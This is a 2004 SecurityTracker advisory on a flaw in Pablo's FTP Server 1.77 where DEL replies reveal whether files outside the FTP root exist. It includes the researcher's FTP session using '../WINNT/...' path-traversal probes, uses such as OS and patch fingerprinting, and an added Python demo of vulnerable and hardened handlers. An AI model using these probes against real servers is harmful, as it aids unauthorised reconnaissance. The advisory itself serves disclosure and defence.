SecurityTracker.com
SecurityTracker Archives

Category:   Application (File Transfer/Sharing)  >   Pablo's FTP Server
Vendors:   Pablo Software Solutions
Pablo FTP Server Lets Remote Authenticated Users Determine File Existence
SecurityTracker Alert ID:  1008756
SecurityTracker URL:  http://securitytracker.com/id/1008756
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jan 18 2004
Impact:   Disclosure of system information, Disclosure of user information
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): 1.77
Description:   Arnaud Jacques from securiteinfo.com reported a vulnerability in the FTP Server from Pablo Software Solutions. A remote authenticated user can determine if a specified file exists on the target server.

It is reported that a remote authenticated user can invoke the DEL command (e.g., "del ../WINNT/Q328310.log") on an arbitrary file located outside of the FTP root directory to determine if the file exists or not. If the specified file exists, the server reportedly responds with:

550 Permission denied.

If the specified file does not exist, the server reportedly responds with:

550 File not found.
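The leak comes from the order of the checks, not from the DEL command itself: the server consults the filesystem (and picks "File not found" or "Permission denied" from the result) before it has decided whether the path is allowed at all. The following is an added example, not code from Pablo's FTP Server, that models a DELE handler both ways: the leaky ordering beside a version that normalises the path, confines it to the root and answers with one fixed reply for anything outside. The directory layout, file names and the build_fixture helper are constructed for the demonstration.

```python
"""Toy model of an FTP DELE handler: the check ordering that leaks whether a
file exists outside the server root, beside a confined, fail-closed version.

Constructed example, not code from Pablo's FTP Server. The directory layout
and file names are made up for the demonstration.
"""
import os
import tempfile
from pathlib import Path

PERMISSION_DENIED = "550 Permission denied."
NOT_FOUND = "550 File not found."
DELETED = "250 DELE command successful."


def _join_like_windows(root: Path, client_path: str) -> Path:
    """Join a client-supplied path onto the root the way a naive server would.
    Backslashes are accepted (Windows clients send them) and a leading separator
    is taken as 'relative to the FTP root', but '..' is deliberately left alone."""
    rel = client_path.replace("\\", "/").lstrip("/")
    return root / rel


def vulnerable_delete(root: Path, client_path: str) -> str:
    """Leaky ordering: existence is tested before the root check, so a path with
    '..' gets a different 550 line depending on whether the file is there."""
    target = _join_like_windows(root, client_path)
    if not target.exists():
        return NOT_FOUND  # already tells the client the file is absent
    root_real = root.resolve()
    if os.path.commonpath([root_real, target.resolve()]) != str(root_real):
        return PERMISSION_DENIED  # ...and this branch tells them it is present
    target.unlink()
    return DELETED


def hardened_delete(root: Path, client_path: str) -> str:
    """Confine first: normalise the path, refuse anything outside the root with
    one fixed reply, and only then touch the filesystem. Outside-root names get
    the same answer whether or not the file exists. resolve() also follows
    symlinks, so a link inside the root pointing outside is refused too."""
    root_real = root.resolve()
    target = _join_like_windows(root, client_path).resolve()  # collapses '..'
    if os.path.commonpath([root_real, target]) != str(root_real):
        return PERMISSION_DENIED
    if not target.is_file():
        return NOT_FOUND  # only reached for paths inside the root
    target.unlink()
    return DELETED


def build_fixture() -> dict:
    """Constructed layout: <tmp>/ftp_root (the server root) holding inside.txt,
    and <tmp>/outside/present.log next to it, standing in for a system file."""
    base = Path(tempfile.mkdtemp())
    root = base / "ftp_root"
    root.mkdir()
    (root / "inside.txt").write_text("ok")
    (base / "outside").mkdir()
    (base / "outside" / "present.log").write_text("installed")
    return {
        "root": root,
        "inside": "inside.txt",
        "outside_present": "..\\outside\\present.log",
        "outside_missing": "..\\outside\\missing.log",
    }


def demo() -> dict:
    """Run both handlers over the same probes and return the replies."""
    fx = build_fixture()
    root = fx["root"]
    probes = ("outside_present", "outside_missing")
    return {
        "vulnerable": {name: vulnerable_delete(root, fx[name]) for name in probes},
        "hardened": {name: hardened_delete(root, fx[name]) for name in probes},
    }


if __name__ == "__main__":
    for handler, replies in demo().items():
        print(handler, replies)
```

Running demo() shows the vulnerable handler answering "550 Permission denied." for the existing outside file and "550 File not found." for the missing one, while the hardened handler answers "550 Permission denied." to both and still deletes files inside the root normally. The general rule is the one the fixed server needs: decide authorisation on the normalised path before any filesystem call, and keep the reply for a refused path independent of what the filesystem would have said.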

Impact:   A remote authenticated user, including an anonymous user, can determine whether a specified file located anywhere on the system exists on the target server.
Solution:   The vendor has released a fixed version (1.8), available at:

http://www.pablovandermeer.nl/ftp_server.html

Vendor URL:  www.pablovandermeer.nl/ftp_server.html
Cause:   State error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Pablo Software Solutions FTP server can detect if a file exists outside


Pablo Software Solutions FTP server can detect if a file exists outside the FTP root directory


.oO Overview Oo.

Pablo Software Solutions FTP server version 1.77 can detect if a file exists
outside the FTP root directory.
Discovered on January 11th, 2004
Vendor: Pablo Software Solutions (http://www.pablovandermeer.nl)

Pablo's FTP Server is a multi threaded FTP server for Windows 98/NT/XP. It
comes with an easy to use interface and can be accessed from the system tray.
The server handles all basic FTP commands and offers easy user account
management and support for virtual directories. This FTP server can detect if
a file exists outside the FTP root directory.


.oO Details Oo.

The vulnerability can be triggered using the MS-DOS ftp client. When you are
logged on to the server, you can send a del \..\<filename>, assuming your root
directory is c:\ftp_server.
If <filename> exists, the FTP server answers "550 Permission denied." If
<filename> doesn't exist, the FTP server answers "550 File not found."
In any case, the file is never deleted. That is normal.


.oO Exploit Oo.

Checking if a file exists on a remote system can be useful to:

     * Fingerprint the OS. OSes don't have the same installed files by default.
       In this way, you can know if the remote system is Windows NT, or 2000 or
       XP...
     * Know the vulnerabilities of a system. By testing if
       "../WINNT/Q329115.log" exists, you can know if the remote system has this
       patch installed.
     * Maybe some other interesting things...

Here is an example of the vulnerability:

C:\>ftp 127.0.0.1
220 Welcome to Pablo's FTP Server
Utilisateur (127.0.0.1:(none)) : test
331 Password required for test
Mot de passe :
230 User successfully logged in.
ftp> dir
200 Port command successful.
150 Opening ASCII mode data connection for directory list.
-rwx------ 1 user group 0 Jan 11 18:18 ceci est le repertoire test.txt
226 Transfer complete
ftp> dir ..
200 Port command successful.
550 "..": Permission denied. That is OK.
ftp> cd ..
550 "..": Permission denied. That is OK.
ftp> del ../WINNT/Q328310.log
550 Permission denied. File exists!
ftp> del ../WINNT/Q329115.log
550 File not found. File does not exist!
ftp> quit


.oO Solution Oo.

The vendor has been informed and has solved the problem.
Download Pablo's FTP server 1.8 at
http://www.pablovandermeer.nl/ftp_server.html


.oO Discovered by Oo.

Arnaud Jacques aka scrap
webmaster@securiteinfo.com
http://www.securiteinfo.com

Copyright 2019, SecurityGlobal.net LLC